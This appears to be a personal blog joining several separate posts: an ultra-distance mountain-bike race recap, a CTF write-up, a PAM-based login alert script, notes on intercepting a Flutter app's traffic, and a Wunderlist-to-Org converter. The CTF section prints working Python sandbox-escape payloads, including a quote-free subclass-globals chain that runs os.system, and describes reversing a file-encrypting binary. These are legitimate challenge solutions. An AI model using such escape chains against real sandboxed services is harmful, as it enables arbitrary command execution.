This past month marked the latest iteration of the 36ONE MTB and the culmination of months of training. In the end, it wasn’t just a race, but a journey that tested my limits and revealed an inner strength I wasn’t sure I possessed.


Back in October, I embarked on a hare-brained idea that would hopefully get me to race day. This involved getting my body accustomed to riding further than I had ever ridden before. Granted, much of that long-distance riding was due to my addiction to adventure. My training might not have been what other folks would have planned. Most of my focus was spent on building my different energy systems using the TrainerRoad platform, which involved a lot of indoor work, supplemented with the occasional longer outdoor ride to test different pieces of kit or nutrition strategies. One of the trickier elements I had to contend with, that most others didn’t, was having the fasting month of Ramadan fall one month before race day. This meant I had to be done with the majority of my training before the start of the fasting month. Once the fasting began, the focus was simply on maintenance and ensuring I didn’t lose any fitness or become sick.

Race Day

Race day was a whirlwind of excitement, anxiety, and relentless rain. The cold downpour drenched us before the starting gun even fired, setting the stage for the challenging 25 hours ahead.

The race was a rollercoaster, not just in terms of terrain, but also the physical and mental trials. One of my concerns was my choice of tires. I had slick Vittoria Terreno dry tires, designed for dry, hard-pack conditions, yet they surprised me with their exceptional handling in the muddy conditions. I also grappled with numbness in my hands and feet and bouts of sleepiness that seemed to hit at the most inopportune times. While numbness is generally normal on long-distance rides, the combination of the cold and rain resulted in me being unable to shift gears (the mud probably didn’t help either).

Nutrition was another challenge. The harsh conditions made eating on the move difficult, forcing me to catch up at the water points, which was far from ideal. The cold made it impossible to keep my nutrition in my jersey pockets or my tri bag (my preferred storage choice). Unfortunately, with only the tri bag being an option (not a great one given the mud), I had to rely on liquid nutrition for the most part.

Despite these hurdles, there were moments of camaraderie that shone brightly. My riding partner for the latter half of the race, Mike Rollers, whom I found just before checkpoint 2, ended up keeping me company and coaching me through the back end of the race when things got pretty dark. Without Mike’s kind words and patience, I really think I might not have made it across the finish line.


In the end, it was worth it. Not only did I finish the race, but I also beat my stretch goal of 26 hours, finishing in 25 hours and 39 minutes, including stops. Most people couldn’t quite believe that I managed to do the race on a gravel bike as a first-timer, especially given the conditions. On some level it felt great to prove everyone wrong and demonstrate just what these machines are capable of (though I suspect the race winner finishing on a gravel bike probably drove that point home much more succinctly).

The 36ONE was a revelation. It taught me about endurance, resilience, and the power of the human spirit. It showed me how to lean into the pain and push through the darkest moments. If you’ve ever contemplated an ultra-distance race, I say, go for it. It’s tough, grueling even, but the indescribable feeling of accomplishment is worth every pedal stroke.


I joined the second HackSouth team a bit late, so some of the challenges were already solved by the time I looked at them. This post is mostly my raw thoughts and flow as I solved the challenges, cleaned up a little with the benefit of hindsight.

Reversing - Alienware

Difficulty 2/4

  • Windows binary (Wine isn’t enough, or maybe it is if you are better than me)
  • decompile binary with ghidra and use x64dbg to debug it
  • step through and wait for a secondary dll to be dumped to disk
  • decompile this binary and see that it’s encrypting files in your users\<username>\docs folder
  • restart the debug session and step into the code, this time with the folders created and some test data in the docs folder
  • extract the key from memory (16 bytes, read as hex qwords)
  • start documenting the code for the encryption to understand it better
  • realize there is no decrypt in the binary
  • start writing c++ code to decrypt the file using windows crypto api
  • waste eons getting the params wrong (thanks to those that helped with this)
    • demo code ripped from here in the hopes it would compile out of the box
    • it did not
    • fix the code so that it compiles
    • continue getting params right
  • finally get the params right, test it on the file we encrypted earlier
  • see that it works, and decrypt the pdf file that was alongside the binary
  • flag is in the file
  • Having a look at other solutions to this challenge, it looks like you could have patched the call to encrypt with a call to decrypt. I wouldn’t have thought that would work since the params are different, but the fact that it gave others the solution means I need to do a bit more testing/research.
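As a side note on the key extraction step: the 16-byte key came out of memory as hex qwords. A minimal sketch of turning two such qwords into raw key bytes (the values and the little-endian layout here are both assumptions for illustration):

```python
import struct

# Hypothetical qword values standing in for what the debugger showed;
# the little-endian layout is an assumption about how the key sat in memory.
qwords = (0x1122334455667788, 0x99AABBCCDDEEFF00)
key = b"".join(struct.pack("<Q", q) for q in qwords)
print(key.hex())  # 16 bytes -> an AES-128-sized key
```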

Reversing - backdoor

Difficulty 2/4

  • this was a two-part challenge, since up front it showed that we needed to connect to a docker container to get the flag
  • running the binary didn’t output anything, except that hitting Ctrl+C would reveal a Python script
  • basic recon on the binary didn’t give too much more away, except that it was using embedded Python
  • tried a few existing tools to get the info out
  • turns out you could just use the archive viewer (pyi-archive_viewer) provided by PyInstaller to view the archive and extract the Python script called bd
  • the script is in compiled pyc format, and while we can see a string that looks like a password when dumping the file to the terminal, using this password on the remote server does nothing but close the connection
  • time to decompile the code
  • none of the decompilers work
  • there is no Python header in the pyc file, which is why all the decompilers fail
  • get the correct magic bytes for the Python version being used and prepend them to the start of the file
  • decompilers now work (uncompyle6)
  • we can now understand what the flow is for the remote server
  • provide the password as an MD5 hash
  • then send a command you want to execute in the format they want e.g. ‘command: ls’
  • I initially missed that you needed to specify the length of the command, so most of my commands failed
  • finally sent through the required code to allow for a long buffered command
  • at which point I could just cat the flag
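The pyc header fix above can be scripted. A minimal sketch, assuming the Python 3.7+ pyc layout (a 16-byte header: magic, flags, mtime, source size) and that you run it under the same interpreter version as the target:

```python
import importlib.util

def add_pyc_header(raw_code: bytes) -> bytes:
    # Python 3.7+ pyc files start with a 16-byte header:
    # 4-byte magic, 4-byte flags, 4-byte source mtime, 4-byte source size.
    header = importlib.util.MAGIC_NUMBER  # magic for *this* interpreter
    header += (0).to_bytes(4, "little")   # flags: 0 = timestamp-based pyc
    header += (0).to_bytes(4, "little")   # dummy source mtime
    header += (0).to_bytes(4, "little")   # dummy source size
    return header + raw_code

# e.g. fixed = add_pyc_header(open("bd", "rb").read())
```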

Misc - input as a service

  • This is a python sandbox escape
  • Took a while to figure out what was allowed or not allowed.
  • Finally realized that the builtins were still available.
  • Looking at other folks’ solutions, it looks like I could have just used open (the Python function) to read the flag directly.
    • e.g. print(open('flag.txt').read())
  • simply use __import__ to import the os namespace and call 'cat flag.txt' to get the flag (you could do ls first to find the file)
    • __import__('os').system('ls')
    • __import__('os').system('cat flag.txt')
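To see why this works, here is a small local mimic of the sandbox; the assumption (as in the challenge) is that eval still has builtins reachable:

```python
# user_input stands in for what you'd type at the remote prompt
user_input = "__import__('os').getcwd()"

# an eval() "sandbox" that leaves builtins reachable is trivially escapable
result = eval(user_input, {"__builtins__": __builtins__}, {})
print(result)  # prints the working directory, proving code execution
```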

Misc - Build yourself in

  • This was a python shell escape again
  • This challenge really gave me a headache
  • So in theory I was ready for another sandbox escape, except now Python’s exec was used and all builtins besides the print function were removed.
  • What this meant in practice was that it was very tedious to test anything until you somehow got access to the builtin functions.
  • To make matters worse, you weren’t allowed to use quotes in your exploit.
  • The approach I took was to find the subclass object locally, then find the correct index into its globals to get access to the builtin functions locally, and hope the indexes matched remotely.
  • Once i had them available locally i could in theory run the same code remotely without the indexes changing as long as i used the same python version (which i did).
  • To get things going, I first stored all the global functions in a short variable
  • a = ().__class__.__bases__[0].__subclasses__()[94].__init__.__globals__.values()
  • I then extracted the chr function to convert numbers to chars so that we don’t have to worry about indexes
  • chr = [a for a in [x for x in a].pop(5).values()].pop(14)
  • I then wrote a small function that generated the chr concats required to make any string I needed; this let me set up the imports and the os call, for example
  • flag = chr(99) + chr(97) + chr(116) + chr(32) + chr(102) + chr(108) + chr(97) + chr(103) + chr(46) + chr(116) + chr(120) + chr(116);os = chr(111) + chr(115);ls = chr(108) + chr(115);imp = chr(95) + chr(95) + chr(105) + chr(109) + chr(112) + chr(111) + chr(114) + chr(116) + chr(95) + chr(95);blt = chr(95) + chr(95) + chr(98) + chr(117) + chr(105) + chr(108) + chr(116) + chr(105) + chr(110) + chr(115) + chr(95) + chr(95);
  • finally, once all that was done, I could simply index the globals dictionary and use the strings I built to cat the flag out
  • ().__class__.__bases__[0].__subclasses__()[94].__init__.__globals__[blt][imp](os).system(flag);
  • the full exploit had to be concatted to one line as seen below to execute correctly on the remote server.
  • a = ().__class__.__bases__[0].__subclasses__()[94].__init__.__globals__.values();chr = [a for a in [x for x in a].pop(5).values()].pop(14);flag = chr(99) + chr(97) + chr(116) + chr(32) + chr(102) + chr(108) + chr(97) + chr(103) + chr(46) + chr(116) + chr(120) + chr(116);os = chr(111) + chr(115);ls = chr(108) + chr(115);imp = chr(95) + chr(95) + chr(105) + chr(109) + chr(112) + chr(111) + chr(114) + chr(116) + chr(95) + chr(95);blt = chr(95) + chr(95) + chr(98) + chr(117) + chr(105) + chr(108) + chr(116) + chr(105) + chr(110) + chr(115) + chr(95) + chr(95);().__class__.__bases__[0].__subclasses__()[94].__init__.__globals__[blt][imp](os).system(flag);
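The helper mentioned above, which turns any string into a quote-free chr() concatenation, might have looked something like this (a sketch of my throwaway function):

```python
def to_chr_expr(s: str) -> str:
    # Build a quote-free expression like chr(99) + chr(97) + ... for a given
    # string, so the payload never needs a quote character.
    return " + ".join(f"chr({n})" for n in map(ord, s))

print(to_chr_expr("os"))  # chr(111) + chr(115)
```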

Misc - alien camp

  • question answer service
  • connect to a remote service, calculate a value, and send the correct answer as fast as possible.
  • The values printed when asking for questions are emojis.
  • Steps to solve are:
    • Connect using pwn tools
    • request option 1
    • parse the strings and store the emoji -> number mapping
    • request option 2
    • parse the string out and replace the emojis with their correct number mappings
    • pass the string to Python’s eval
    • send the response back using pwn tools send_raw
    • let the program run for all 500 questions and then the flag will be printed.
  • This is a fairly common challenge, and the biggest time sink for me was thinking I needed to use the emoji hex values as the numbers; once I realized there was a mapping, it was pretty simple.
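The parsing and answering side of the steps above can be sketched as below, with the pwntools plumbing omitted; the exact "<emoji> = <number>" menu format is an assumption:

```python
import re

def build_mapping(menu_text: str) -> dict:
    # Parse lines like "🐵 = 7" into an emoji -> number-string mapping.
    # The "<emoji> = <number>" layout is an assumption about the menu format.
    return {m.group(1): m.group(2)
            for m in re.finditer(r"(\S+)\s*=\s*(\d+)", menu_text)}

def answer(question: str, mapping: dict) -> int:
    # Substitute each emoji with its number, then evaluate the arithmetic.
    for emoji, number in mapping.items():
        question = question.replace(emoji, number)
    return eval(question)
```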

Hardware - serial logs

  • Recon: download the file, extract it, and see what’s available
  • Initial inspection shows it’s a zip
  • extracting reveals a binary data file
  • load the file into a hex editor
  • the file has a magic string that points to the capture app (Logic 2)
  • Download app and load file
  • digital logic analyzer trace shows up in a raw form
  • do more recon to find out how the logs were captured (i.e. what protocol)
  • confirm in the app that the logs are async serial, which effectively translates to UART
  • once the analyzer is selected, raw hex is displayed
  • this is not correct; the most likely culprit is the baud rate
  • sad to say, but I initially just brute-forced my way through the different baud rates
  • find the correct baud rate by looking at the stream data and seeing raw text being output
  • do some initial analysis to see if the long strings being output are related to the challenge (they are not)
  • see that the stream terminates, indicating that the baud rate has changed again
  • clear out the old logs to make it easier to analyze
  • check the high-voltage edges, measure their duration, and use this to calculate the baud rate
  • the formula used is 1/(pulse width in µs) × 10^6, e.g. 1/13.4 × 10^6 (note: the value here is just an example; check the trace for the actual value)
  • this gives you the bit rate, which you can round and enter as a custom baud rate into Logic 2’s analyzer
  • you should now see the clean logs, and the last line has the flag
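The baud-rate formula above is just the reciprocal of the bit pulse width. As a quick sketch (13.4 µs is the illustrative value from above, not the real trace value):

```python
def baud_from_pulse(pulse_us: float) -> int:
    # One UART bit lasts pulse_us microseconds, so the bit rate is
    # 1 / pulse_us * 10^6 bits per second.
    return round(1 / pulse_us * 1_000_000)

print(baud_from_pulse(13.4))  # ~74627; round to the nearest sane custom rate
```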

Hardware - Compromised

  • We know that it’s a Logic 2 file this time, so we can skip a lot of the initial recon steps
  • this trace uses a new protocol, I2C
  • load the correct analyzer
  • change the output into ascii
  • you should see that there are commands and data being sent to 2 devices
  • export the stream to csv
  • import the stream into google sheets or excel
  • filter only on the contents being sent to the ‘,’ device (this is the ASCII rendering of its address)
  • scroll to the bottom of the trace and the flag is listed downwards
  • copy the flag out, paste it into an editor, and concat the lines into a single-line string
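The spreadsheet filtering can also be done in a few lines of Python. A sketch assuming a Logic 2 CSV export with address and data columns (the column names are assumptions, so check them against your actual export):

```python
import csv

def extract_flag_bytes(csv_path: str, target_addr: str) -> str:
    # Keep only the data written to the target device, joining the
    # characters in order; column names are assumed from the export.
    chars = []
    with open(csv_path, newline="") as f:
        for row in csv.DictReader(f):
            if row.get("address") == target_addr and row.get("data"):
                chars.append(row["data"])
    return "".join(chars)
```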


For the longest time I have had the idea to implement a notification system that would alert you if someone ever logged in, or tried to log in, using a known password of yours.

That password might have been obtained from a previously compromised online account or just guessed based on your personality; either way, the objective is that you are alerted as soon as possible. To this end I remembered an app built by haroon@thinkst eons ago that worked on macOS and took a picture of whoever disturbed the Mac’s screensaver.

I wanted to achieve something similar for Linux (and hopefully Windows at some point), but triggered only when someone tried to log in using a known password (in theory it could be on any login). While the current implementation doesn’t take a snapshot, since it’s only hooked up to SSH auth, you could in theory hook it up to a system’s GUI login and capture those login attempts as well.

Initial Research

After some basic investigation I found that this can be done fairly easily using a Pluggable Authentication Module (PAM). This is because it’s fairly dynamic and no major system changes are required.


The final implementation was built using the pam_script module which lets you hook into PAM and call a shell script of your choice.

First we need to grab a copy of the pam_script repo. Once downloaded, compile and install the library with the following commands:

cd pam_script # assuming you aren't already in the folder
autoreconf -i
./configure
make install

Once installed, we need to configure PAM by adding the line below to /etc/pam.d/sshd. This location is based on my current setup and may differ depending on how PAM is configured.

auth      optional  pam_script.so

Once we have PAM configured, we need to modify the script that is called when a user fails to log in. On my system this is located @ /usr/local/etc/pam_script_auth. Note that by default this is linked to a script located in the same folder; either modify the linked script or create a new script and update the link. I took the path of creating a new script and updating the link. You can find the demo script below.

#!/bin/sh

if [ "$PAM_USER" = "rc1140" ] && [ "$PAM_AUTHTOK" = "ThePoliceHaveMe" ]; then
  echo "the police are here" >> /tmp/alerts
  curl ''
fi

# success
exit 0

The script itself doesn’t do much aside from echoing some text to a file and then calling a canary token. The canary token works nicely here since you can send the alert notification with very minimal infrastructure and without indicating who has been alerted. I tend to restart the SSH service to ensure that the PAM modifications are loaded, but this is probably not needed.


That’s it really. You could probably make this far more complicated and covert with a full PAM module, or by modifying the source of the various login applications, but the PAM method provides a more generic and pluggable approach. Additionally, using pam_script makes it even more dynamic and easy to implement.


Having recently had to reverse an Android application built with the Flutter framework, I figured this is as good a time as any to record my thoughts, now that I have roughly achieved what I wanted out of the exercise.


The primary goal was to figure out what type of API the app was using and then extract the API into a library so that it could be used for another automation project.

Aside from that I wanted to know if the app was possibly leaking any sensitive info.


The issues below were encountered over the course of the project and were not really known to me up front.

The app was compiled with Flutter and presented a number of issues, listed below.

  • Code is compiled and executed using the Dart VM when in release mode (which will be the case in a black-box test).
  • The application does not use the system proxy.
  • The application does not use user-installed CA certs, as it has a number of certs compiled into the app.
  • Whatever Java code is included is usually written in Kotlin (though this may not always be the case).
  • In the case of a black-box app, it will likely have been compiled with ARM binaries only and as such can’t be used in an emulator (unless you have the patience of a saint).

Initial plan of attack and subsequent updates

Initially I had planned to simply disassemble the apk, convert everything to classes, and pull out the required HTTP calls from the code. This approach has worked fairly well for me before, but because of the amount of compiled code it wasn’t viable this time.

While I had the app unpacked, some basic recon showed that it was likely built with Google’s Flutter framework, supplemented by some native code which talked to a number of Google services (Firebase and a few others popped out based on their config).

It should be noted at this point that I didn’t have a rooted device with which to test the application (most guides require a rooted phone to use the tools that force an app’s traffic through a proxy).

With the disassembly not giving up any clear, distinct API calls, I proceeded to try some dynamic analysis. This ended up being one of those sad yak-shaving moments, with me trying one emulator after another to find one that worked decently and let me run the application. In the end this proved pointless, as I couldn’t get an ARM image running, and the binaries within the application were compiled for ARM only and would not run within any of the emulators. I did not go down the route of using the ARM AVD images as they were just frustratingly slow.

What worked

After wasting a bunch of time trying to get the app analysed in an emulator, I finally dug out an old Android device, went through the pain of rooting it, and then followed the guide below.

If you don’t feel like reading the entire guide, the tl;dr is: root your device, install your proxy cert as a system cert, set up a gateway device on your network, and then set up a transparent proxy on that gateway. In the end this actually worked, and I finally managed to intercept the app’s calls. Luckily I did not have to deal with root detection in the app, or I would have needed even more time to analyze it.

Conclusion, follow up research and other notes

In the end I managed to get the API calls I wanted, but the entire process felt like a pain of note. One other avenue I briefly explored, while trying to get the app running in the VM, was to pull down multiple older copies of the app to find a version that wasn’t using Flutter. This sort of worked, and I managed to get some extra actionable intelligence about the app, but it felt like another yak-shaving session, as the API code seems to be generated from a definition file of sorts. Translating that into something usable felt like it would have taken too long, and would still have required me to figure out the config params from the Kotlin code, which was driving me crazy in its decompiled form.

Thankfully though, now that this is all set up, I can easily reuse it for further analysis.

If I get some time in the future I would like to setup a small project so that I can try and reverse the AOT compiled dart code and see if that could prove useful.


Sometime last year Wunderlist was acquired by Microsoft, and while this is awesome for them, it left me with a dilemma: migrate to Microsoft’s To Do application or find an alternative.

Sadly, Microsoft’s To Do application failed to migrate all my tasks (well, any tasks) from Wunderlist, which left me hunting for an alternative instead. Since the announcement was made, I honestly haven’t found anything simple, functional, and fast enough to replace Wunderlist.

Recently, though, I have started using Emacs’s Org mode more and more. Combined with the awesome Orgzly application that was suggested somewhere on the net, this meant I finally had a solution to the Wunderlist migration. The beauty of using org files for my todos and agenda is that it’s all plain text, which makes syncing super simple while catering for all my needs. Making matters even better, I could now dump the Wunderlist data (which they provide as JSON) and spit out a super simple org mode file and happily continue.


The code to handle the conversion is fairly simple: it is just a matter of finding all the incomplete tasks and grouping them by the lists they were in. The code leaves much to be desired, but it’s pretty much a dump from my IPython history, so go easy on me ;P

Running the script will dump the output to stdout. Feel free to pipe this to a file or optionally change the code to write directly to file.
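For reference, a cleaned-up sketch of that conversion; the field names ('id', 'title', 'list_id', 'completed') are assumptions about the shape of the Wunderlist JSON dump, so adjust them to match your export:

```python
import json
from collections import defaultdict

def wunderlist_to_org(lists: list, tasks: list) -> str:
    # Group incomplete tasks under the Org heading of the list they belong to.
    list_names = {l["id"]: l["title"] for l in lists}
    grouped = defaultdict(list)
    for task in tasks:
        if not task.get("completed"):
            grouped[task["list_id"]].append(task["title"])
    lines = []
    for list_id, titles in grouped.items():
        lines.append(f"* {list_names.get(list_id, 'Inbox')}")
        lines.extend(f"** TODO {title}" for title in titles)
    return "\n".join(lines)

# e.g. print(wunderlist_to_org(json.load(open("lists.json")),
#                              json.load(open("tasks.json"))))
```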